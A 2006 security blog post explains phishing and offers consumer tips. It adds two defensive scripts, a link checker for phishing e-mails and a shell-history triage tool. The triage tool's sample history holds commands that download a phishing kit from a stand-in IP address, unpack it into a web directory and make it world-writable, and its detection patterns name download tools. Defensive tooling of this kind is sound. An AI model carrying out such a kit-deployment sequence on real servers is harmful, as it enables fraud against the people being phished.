My Life as an Internet Security Consultant

Thursday, June 22, 2006

What is phishing?

Phishing attacks are fraudulent e-mails that appear to come from legitimate online merchants, such as eBay or PayPal, or from financial institutions, such as banks or credit unions. When you click on a link in the e-mail, you are redirected to a site that may look like the merchant's or the bank's, but isn't. You can avoid phishing scams:
  • Don't reply to e-mails, or click on links in the body of an e-mail, that ask for your personal or financial information.
  • Never send an e-mail that contains your personal or financial information.
  • Review credit card and bank statements as soon as they arrive.
  • Use anti-virus software and keep it up to date.
  • Don't open or download e-mail attachments unless you are sure they are free of viruses and trojans and come from a trusted source.
  • Report suspected phishing attacks to both the apparent source (i.e. the bank or merchant the e-mail claimed to be from) and the FTC.
Here is an example of phishing:
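The advice above boils down to one habit: check where a link really goes before clicking it. The following script is an added example (not part of the original post) that applies the same check mechanically to the HTML body of an e-mail. It flags links whose visible text names one host while the href points to another, links whose host is a raw IP address, and links whose host merely contains a trusted brand name without being under that brand's real domain. The trusted-domain list and the sample e-mail are constructed for the example.

```python
"""Flag suspicious links in an HTML e-mail body (added example, not the post's code)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed list of legitimate domains for the brands a phisher might imitate.
TRUSTED_DOMAINS = ("ebay.com", "paypal.com")

# Constructed sample e-mail body: two phishing-style links and one genuine one.
SAMPLE_EMAIL = """
<p>Dear customer, your account will be suspended unless you confirm your details.</p>
<p><a href="http://www.ebay.com.secure-login.example/verify.php">www.ebay.com</a></p>
<p><a href="http://192.0.2.10/verify.php">Verify now</a></p>
<p><a href="https://www.paypal.com/help">PayPal Help Center</a></p>
"""

IP_LITERAL = re.compile(r"\d{1,3}(\.\d{1,3}){3}")
LOOKS_LIKE_DOMAIN = re.compile(r"\S+\.\S+")   # visible text such as "www.ebay.com"


class _LinkCollector(HTMLParser):
    """Collect every <a href=...> together with the text the reader sees."""

    def __init__(self):
        super().__init__()
        self.links = []          # list of (href, visible_text)
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(value):
    """Lower-case host of a URL or bare domain, or '' if there is none."""
    if "://" not in value:
        value = "http://" + value
    return (urlparse(value).hostname or "").lower()


def _is_trusted(host, trusted):
    """True if host is one of the trusted domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in trusted)


def suspicious_links(html, trusted_domains=TRUSTED_DOMAINS):
    """Return [(href, [reason, ...]), ...] for every link that deserves a closer look."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        host = _host(href)
        reasons = []
        if IP_LITERAL.fullmatch(host):
            reasons.append("link host is a raw IP address")
        shown = _host(text) if LOOKS_LIKE_DOMAIN.fullmatch(text) else ""
        if shown and shown != host:
            reasons.append(f"visible text says {shown!r} but link goes to {host!r}")
        for domain in trusted_domains:
            brand = domain.split(".")[0]
            if brand in host and not _is_trusted(host, trusted_domains):
                reasons.append(f"host {host!r} imitates {domain!r} but is not under it")
        if reasons:
            findings.append((href, reasons))
    return findings


if __name__ == "__main__":
    for href, reasons in suspicious_links(SAMPLE_EMAIL):
        print(href)
        for reason in reasons:
            print("   -", reason)
```

The brand check is deliberately crude (a substring match), which is why it is paired with the domain-suffix test: "www.ebay.com" passes because it is under ebay.com, while "www.ebay.com.secure-login.example" is flagged because the real registrable domain is the attacker's, not eBay's.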

Figure 1.1 This is the real eBay page, but its source code has been modified for phishing.

Figure 1.2 Issuing the command "finger jane" in Unix shows the IP address of the attacker's last login.

Figure 1.3 The command "more .bash_history" shows what the attacker has been doing in your box.

Figure 1.4 The directory of the files the attacker is using for phishing.

Figure 1.5 The actual files used for phishing.

Figure 1.6 The source code inside flee.php.

Those pictures were sent to me last year by my friend. So be careful when visiting untrusted sites!
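Figures 1.2 to 1.5 show the manual triage of a compromised account: check the last login, read the shell history, and look for the phishing files. The script below is an added example (not code from the post or its author) that does the ".bash_history" part of that triage automatically. It scans a history file for the steps a phishing kit deployment typically leaves behind (fetching a remote file, unpacking an archive, copying into a web-served directory, loosening permissions, editing PHP) and reports whether those steps occur in order. The indicator list and the sample history are constructed for the example; a real review should still read the whole file, since history only records what was left behind.

```python
"""Triage a Unix shell history for signs of a phishing kit being deployed (added example)."""
import re

# Each indicator is (pattern, explanation). Tool names are anchored to the start of a
# command (or after ; & |) so that "signin.tar.gz" does not look like a tar invocation.
INDICATORS = [
    (re.compile(r"(?:^|[;&|]\s*)(?:wget|curl|scp|ftp)\b"), "fetches a remote file"),
    (re.compile(r"(?:^|[;&|]\s*)(?:tar|unzip|gunzip)\b"), "unpacks an archive"),
    (re.compile(r"(?:public_html|/var/www|htdocs)"), "touches a web-served directory"),
    (re.compile(r"\bchmod\s+(?:-R\s+)?[0-7]*77\b"), "grants world-writable permissions"),
    (re.compile(r"\.php\b"), "handles PHP files"),
]

# Constructed sample .bash_history; the host and file names are made up.
SAMPLE_HISTORY = """\
ls -la
cd /tmp
wget http://198.51.100.7/signin.tar.gz
tar xzf signin.tar.gz
cp -r signin ~/public_html/
chmod 777 ~/public_html/signin
vi ~/public_html/signin/login.php
ls
"""


def triage_history(history_text):
    """Return [(line_number, command, [reason, ...]), ...] for every flagged command."""
    hits = []
    for lineno, cmd in enumerate(history_text.splitlines(), 1):
        reasons = [why for pattern, why in INDICATORS if pattern.search(cmd)]
        if reasons:
            hits.append((lineno, cmd, reasons))
    return hits


def kit_deployment_detected(hits):
    """True when a fetch, then an unpack, then a write into a web directory appear in order."""
    stages = ("fetches a remote file", "unpacks an archive", "touches a web-served directory")
    stage = 0
    for _, _, reasons in hits:
        if stages[stage] in reasons:
            stage += 1
            if stage == len(stages):
                return True
    return False


if __name__ == "__main__":
    hits = triage_history(SAMPLE_HISTORY)
    for lineno, cmd, reasons in hits:
        print(f"{lineno:4}: {cmd}")
        for reason in reasons:
            print("        ->", reason)
    print("kit deployment sequence found:", kit_deployment_detected(hits))
```

Pointing `triage_history` at the contents of a real `~/.bash_history` (the file Figure 1.3 is viewing with `more`) gives the same list the author read by hand, with the lines that led to the directory in Figure 1.4 called out first.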

